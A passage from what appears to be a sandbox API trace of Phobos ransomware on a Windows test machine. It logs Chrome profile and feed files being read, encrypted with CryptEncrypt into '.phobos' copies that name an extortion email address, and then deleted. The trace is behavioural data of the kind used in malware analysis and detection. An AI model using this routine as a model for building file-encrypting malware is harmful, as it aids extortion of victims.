lpNewFilePointer=0x0) returned 1 [0185.834] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0185.834] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0185.835] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.835] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x20000, lpOverlapped=0x0) returned 1 [0185.914] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20010, dwBufLen=0x20010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20010) returned 1 [0185.915] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20010, lpOverlapped=0x0) returned 1 [0185.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0185.918] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.918] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0185.918] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.918] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0185.918] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.918] CloseHandle (hObject=0x12c) returned 1 [0185.918] CloseHandle (hObject=0x194) returned 1 [0185.918] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links")) returned 1 [0185.920] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0185.920] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=167414) returned 1 [0185.921] CloseHandle (hObject=0x194) returned 1 [0185.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico")) returned 0x2020 [0185.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0185.921] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.921] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0185.938] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0185.938] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.938] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x28df6, lpOverlapped=0x0) returned 1 [0186.056] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x28e00, dwBufLen=0x28e00 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x28e00) returned 1 [0186.058] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x28e00, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x28e00, lpOverlapped=0x0) returned 1 [0186.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0186.061] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.061] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0186.061] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.061] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0186.061] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.061] CloseHandle (hObject=0x194) returned 1 [0186.061] CloseHandle (hObject=0x12c) returned 1 [0186.062] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico")) returned 1 [0186.064] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.064] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16) returned 1 [0186.064] CloseHandle (hObject=0x12c) returned 1 [0186.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5")) returned 0x2020 [0186.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.065] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.065] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.066] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.066] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10, lpOverlapped=0x0) returned 1 [0186.067] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0186.067] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0186.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0186.202] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.202] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0186.202] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.202] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0186.202] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.202] CloseHandle (hObject=0x12c) returned 1 [0186.203] CloseHandle (hObject=0x194) returned 1 [0186.203] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5")) returned 1 [0186.204] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.204] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=69632) returned 1 [0186.205] CloseHandle (hObject=0x194) returned 1 [0186.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data")) returned 0x2020 [0186.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.205] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.205] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.206] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.206] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x11000, lpOverlapped=0x0) returned 1 [0186.269] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x11010, dwBufLen=0x11010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x11010) returned 1 [0186.269] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x11010, lpOverlapped=0x0) returned 1 [0186.279] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0186.279] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.279] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0186.279] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.279] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0186.279] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.279] CloseHandle (hObject=0x194) returned 1 [0186.279] CloseHandle (hObject=0x12c) returned 1 [0186.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data")) returned 1 [0186.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.281] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5120) returned 1 [0186.281] CloseHandle (hObject=0x12c) returned 1 [0186.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids")) returned 0x2020 [0186.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.281] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.282] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.282] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.282] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.282] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1400, lpOverlapped=0x0) returned 1 [0186.365] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1410, dwBufLen=0x1410 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1410) returned 1 [0186.365] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1410, lpOverlapped=0x0) returned 1 [0186.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0186.367] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.367] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0186.367] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.367] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0186.367] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.367] CloseHandle (hObject=0x12c) returned 1 [0186.367] CloseHandle (hObject=0x194) returned 1 [0186.367] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids")) returned 1 [0186.368] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.370] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=28672) returned 1 [0186.370] CloseHandle (hObject=0x194) returned 1 [0186.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms")) returned 0x2020 [0186.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at 